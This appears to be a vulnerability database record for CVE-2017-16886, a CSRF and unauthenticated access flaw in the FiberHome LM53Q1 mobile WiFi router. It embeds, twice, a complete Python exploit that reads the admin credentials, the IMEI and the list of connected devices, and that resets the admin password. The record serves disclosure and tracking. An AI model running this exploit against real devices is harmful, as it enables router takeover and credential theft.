VAR-201801-0581
Vulnerability from variot - Updated: 2024-11-23 19:38The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services via CSRF can result in an unauthorized change of username or password of the administrator of the portal. FiberHome mobile WIFI Device model LM53Q1 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. #!/usr/bin/python
/$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$
| $$_/|/| $$ | $$ | $$ | $$ $$ | $$ | $$_____/ | $$ |/ | $$
| $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$
| $$$$$ | $$| $$ $$ /$$ $$ /$$ $$| $$$$$$$$ /$$ $$| $$ $$ $$ /$$ $$ | $$$$$$$/ /$$ $$| $$ $$ $$ /$$ $$| $$/ /$$ $$ | $$$$$ | $$ /$$/ /$$ $$| $$ /$$ $$| $$| $$/
| $$/ | $$| $$ \ $$| $$$$$$$$| $$ __/| $$ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$
| $$ | $$| $$ | $$| $$_/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$/ | $$ \ $$| $$__/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$
| $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/
|/ |/|_/ _______/|/ |/ |/ ______/ |/ |/ |/ _______/ |/ |/ _______/|/ |/ |/ ______/ _/ ___/ |______/|/ _/| $$_/ |/ ______/ |/ ___/
| $$
| $$
|__/
Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities
Exploit Author: Ibad Shah
Vendor Homepage: www.fiberhome.com
Version: VH519R05C01S38
Tested on: Linux
Platform : Hardware
CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887
Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC
import requests,sys,getopt,socket,struct
Declaring IP as our global variable to probe for Gateway IP of Device
global ip
Getting Gateway IP Address
def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return;
ip = get_default_gateway_linux()
exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================";
Function to get Device Statistics
def get_device_details():
gateway = None
hardware = None
device_name = None
devices_all = ''
version = None
gateway = None
ssid = ''
dns1 = None
dns2 = None
requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1")
api_response = requestStatus.content.replace('\t','').split('\n')
for results in api_response:
if "<hardware_version>" in results:
hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','')
if "<device_name>" in results:
device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','')
if "<version_num>" in results:
version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','')
if "<gateway>" in results:
gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','')
if "<ssid>" in results:
ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','')
if "<dns1>" in results:
dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','')
if "<dns2>" in results:
dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','')
if "<IMEI>" in results:
imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','')
print "\n=============================================="
print "\nHardware Version of Device : "+hardware+"\n"
print "\nName of Device : "+device_name+"\n"
print "\nSoftware Version of Device : "+version+"\n"
print "\nIMEI of Device! : "+imei+"\n"
print "\nWiFi SSID of Device : "+ssid+"\n"
print "\nGateway of Zong Device : "+gateway+"\n"
print "\nDNS Primary of Device : "+dns1+"\n"
print "\nDNS Secondary of Device : "+dns2+"\n"
print "\n=============================================================================\n";
if "<known_devices_list>" in results:
devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','')
print "\nConnected Devices to WIFI\n"
print devices_all
Function for getting User Account Details to login to Portal
def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "" in admin_login_response: username = admin_login_response.replace('','').replace('','') if "" in admin_login_response: password = admin_login_response.replace('','').replace('','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n";
Function to change Administrator Password
def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = ""+password+"" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!"
def main():
print exploit_title
print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device"
get_option = raw_input("\n Enter Option : ");
option = int(get_option)
if get_option == "1":
get_user_account_details()
raw_input("\n Press Any Key To Exit");
elif get_option == "2":
get_device_details()
raw_input("\n Press Any Key To Exit");
elif get_option == "3":
change_admin_password()
elif get_option == "":
print "Good Bye!";
else:
print "Goodbye!";
main()
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201801-0581",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "lm53q1",
"scope": "eq",
"trust": 1.6,
"vendor": "fiberhome",
"version": "vh519r05c01s38"
},
{
"model": "lm53q1",
"scope": "eq",
"trust": 0.8,
"vendor": "fiberhome group",
"version": "vh519r05c01s38"
},
{
"model": "mobile wifi device lm53q1 vh519r05c01s38",
"scope": null,
"trust": 0.6,
"vendor": "fiberhome",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:fiberhomegroup:lm53q1_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Ibad Shah",
"sources": [
{
"db": "PACKETSTORM",
"id": "145737"
}
],
"trust": 0.1
},
"cve": "CVE-2017-16886",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-16886",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-04087",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-107853",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2017-16886",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-16886",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-16886",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2018-04087",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201711-805",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-107853",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "VULHUB",
"id": "VHN-107853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services via CSRF can result in an unauthorized change of username or password of the administrator of the portal. FiberHome mobile WIFI Device model LM53Q1 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. #!/usr/bin/python\n\n# /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$\n# | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$\n# | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \\ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$\n# | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/\n# | $$__/ | $$| $$ \\ $$| $$$$$$$$| $$ \\__/| $$__ $$| $$ \\ $$| $$ \\ $$ \\ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \\ $$ \\ $$| $$ \\ $$ | $$ | $$$$$$$$ | $$__/ \\ $$$$/ | $$ \\ $$| $$| $$ \\ $$| $$ | $$\n# | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \\ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ \u003e$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$\n# | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/\n# |__/ |__/|_______/ \\_______/|__/ |__/ |__/ \\______/ |__/ |__/ |__/ \\_______/ |__/ |__/ \\_______/|__/ |__/ |__/ \\______/ \\___/ \\_______/ |________/|__/ \\__/| $$____/ |__/ \\______/ |__/ \\___/\n# | $$\n# | $$\n# |__/\n# Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities\n# Exploit Author: Ibad Shah\n# Vendor Homepage: www.fiberhome.com\n# Version: VH519R05C01S38\n# Tested on: Linux\n# Platform : Hardware\n# CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887\n# Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC\n\nimport requests,sys,getopt,socket,struct\n\n#Declaring IP as our global variable to probe for Gateway IP of Device\nglobal ip\n\n#Getting Gateway IP Address\ndef get_default_gateway_linux():\n with open(\"/proc/net/route\") as fh:\n for line in fh:\n fields = line.strip().split()\n if fields[1] != \u002700000000\u0027 or not int(fields[3], 16) \u0026 2:\n continue\n return socket.inet_ntoa(struct.pack(\"\u003cL\", int(fields[2], 16)))\n\treturn;\n\n\nip = get_default_gateway_linux()\n\nexploit_title = \"=============================================== \\n FiberHome Remote Administrator Account Details \\n================================================\";\n\n\n#Function to get Device Statistics \ndef get_device_details():\n\n\tgateway = None\n\thardware = None\n\tdevice_name = None\n\tdevices_all = \u0027\u0027\n\tversion = None\n\tgateway = None\n\tssid = \u0027\u0027\n\tdns1 = None\n\tdns2 = None\n\n\n\trequestStatus = requests.get(\"http://192.168.8.1/xml_action.cgi?method=get\u0026module=duster\u0026file=status1\")\n\tapi_response = requestStatus.content.replace(\u0027\\t\u0027,\u0027\u0027).split(\u0027\\n\u0027)\n\tfor results in api_response:\n \tif \"\u003chardware_version\u003e\" in results:\n \thardware = results.replace(\u0027\u003chardware_version\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/hardware_version\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cdevice_name\u003e\" in results:\n \tdevice_name = results.replace(\u0027\u003cdevice_name\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/device_name\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cversion_num\u003e\" in results:\n \tversion = results.replace(\u0027\u003cversion_num\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/version_num\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cgateway\u003e\" in results:\n \tgateway = results.replace(\u0027\u003cgateway\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/gateway\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cssid\u003e\" in results:\n \tssid = results.replace(\u0027\u003cssid\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/ssid\u003e\u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cdns1\u003e\" in results:\n \tdns1 = results.replace(\u0027\u003cdns1\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/dns1\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cdns2\u003e\" in results:\n \tdns2 = results.replace(\u0027\u003cdns2\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/dns2\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tif \"\u003cIMEI\u003e\" in results:\n \timei = results.replace(\u0027\u003cIMEI\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/IMEI\u003e\u0027,\u0027\u0027).replace(\u0027 \u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \tprint \"\\n==============================================\"\n\n \tprint \"\\nHardware Version of Device : \"+hardware+\"\\n\"\n \tprint \"\\nName of Device : \"+device_name+\"\\n\"\n \t\tprint \"\\nSoftware Version of Device : \"+version+\"\\n\"\n \t\tprint \"\\nIMEI of Device! : \"+imei+\"\\n\"\n \t\tprint \"\\nWiFi SSID of Device : \"+ssid+\"\\n\"\n\t print \"\\nGateway of Zong Device : \"+gateway+\"\\n\"\n \t\tprint \"\\nDNS Primary of Device : \"+dns1+\"\\n\"\n\t\t print \"\\nDNS Secondary of Device : \"+dns2+\"\\n\"\n\t print \"\\n=============================================================================\\n\";\n\t if \"\u003cknown_devices_list\u003e\" in results:\n \t\tdevices_all = results.replace(\u0027\u003cknown_devices_list\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/known_devices_list\u003e\u0027,\u0027\u0027).replace(\u0027\\n\u0027,\u0027\u0027)\n \t\tprint \"\\nConnected Devices to WIFI\\n\"\n \t\tprint devices_all\n\n\n#Function for getting User Account Details to login to Portal\ndef get_user_account_details():\n\trequest = requests.get(\"http://\"+ip+\"/xml_action.cgi?method=get\u0026module=duster\u0026file=admin\")\n\tadmin_details = request.content.replace(\u0027\\t\u0027,\u0027\u0027).split(\u0027\\n\u0027)\n\tfor admin_login_response in admin_details:\n \tif \"\u003crouter_username\u003e\" in admin_login_response:\n \tusername = admin_login_response.replace(\u0027\u003crouter_username\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/router_username\u003e\u0027,\u0027\u0027)\n \tif \"\u003crouter_password\u003e\" in admin_login_response:\n \tpassword = admin_login_response.replace(\u0027\u003crouter_password\u003e\u0027,\u0027\u0027).replace(\u0027\u003c/router_password\u003e\u0027,\u0027\u0027)\n \tprint \"\\nUsername of Device Web Application :\\n\"+username+\" \"\n \tprint \"Password of Device Web Application :\\n\"+password+\"\\n\"\n \tprint \"\\n=============================================================================\\n\";\n\n\n#Function to change Administrator Password \n\ndef change_admin_password():\n\tset_password = raw_input(\"\\nEnter Password to Change : \")\n\tpassword = str(set_password)\n\txml = \"\u003c?xml version=\u00271.0\u0027 encoding=\u0027UTF-8\u0027?\u003e\u003cRGW\u003e\u003cmanagement\u003e\u003crouter_password\u003e\"+password+\"\u003c/router_password\u003e\u003c/management\u003e\u003c/RGW\u003e\"\n\theaders = {\u0027Content-Type\u0027: \u0027application/xml\u0027} \n\tchange_password_request = requests.post(\"http://\"+ip+\"/xml_action.cgi?method=set\u0026module=duster\u0026file=admin\", data=xml, headers=headers).text\n\tprint \"Password Changed!\"\n\n\ndef main():\n\n\tprint exploit_title\n\tprint \"\\nSelect Menu For Fetching Details \\n \\n 1. Get Portal Login \u0026 Password. \\n 2. Get Other Details. \\n 3. Change Admin Password for Device\"\n\n\tget_option = raw_input(\"\\n Enter Option : \");\n\n\toption = int(get_option)\n\n\tif get_option == \"1\":\n\n \tget_user_account_details()\n\n \traw_input(\"\\n Press Any Key To Exit\");\n\n\telif get_option == \"2\":\n\n \tget_device_details()\n\n \traw_input(\"\\n Press Any Key To Exit\");\n\n\telif get_option == \"3\":\n\n\t\tchange_admin_password()\n\n\telif get_option == \"\":\n\n\t\tprint \"Good Bye!\";\n\n\telse:\n\n\t\tprint \"Goodbye!\";\n\nmain()\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-16886"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "VULHUB",
"id": "VHN-107853"
},
{
"db": "PACKETSTORM",
"id": "145737"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-107853",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-107853"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-16886",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "43460",
"trust": 2.3
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201711-805",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "43460",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2018-04087",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-107853",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "145737",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "VULHUB",
"id": "VHN-107853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "PACKETSTORM",
"id": "145737"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"id": "VAR-201801-0581",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "VULHUB",
"id": "VHN-107853"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
}
]
},
"last_update_date": "2024-11-23T19:38:45.056000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://hk.fiberhomegroup.com/en/index.html"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-107853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://seclists.org/fulldisclosure/2018/jan/28"
},
{
"trust": 2.3,
"url": "https://www.exploit-db.com/exploits/43460/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16886"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-16886"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16887"
},
{
"trust": 0.1,
"url": "https://www.fiberhome.com"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-16885"
},
{
"trust": 0.1,
"url": "http://\"+ip+\"/xml_action.cgi?method=set\u0026module=duster\u0026file=admin\","
},
{
"trust": 0.1,
"url": "http://192.168.8.1/xml_action.cgi?method=get\u0026module=duster\u0026file=status1\")"
},
{
"trust": 0.1,
"url": "http://\"+ip+\"/xml_action.cgi?method=get\u0026module=duster\u0026file=admin\")"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "VULHUB",
"id": "VHN-107853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "PACKETSTORM",
"id": "145737"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"db": "VULHUB",
"id": "VHN-107853"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"db": "PACKETSTORM",
"id": "145737"
},
{
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
"date": "2018-01-12T00:00:00",
"db": "VULHUB",
"id": "VHN-107853"
},
{
"date": "2018-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-012102"
},
{
"date": "2018-01-07T14:44:44",
"db": "PACKETSTORM",
"id": "145737"
},
{
"date": "2017-11-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201711-805"
},
{
"date": "2018-01-12T17:29:00.943000",
"db": "NVD",
"id": "CVE-2017-16886"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-04087"
},
{
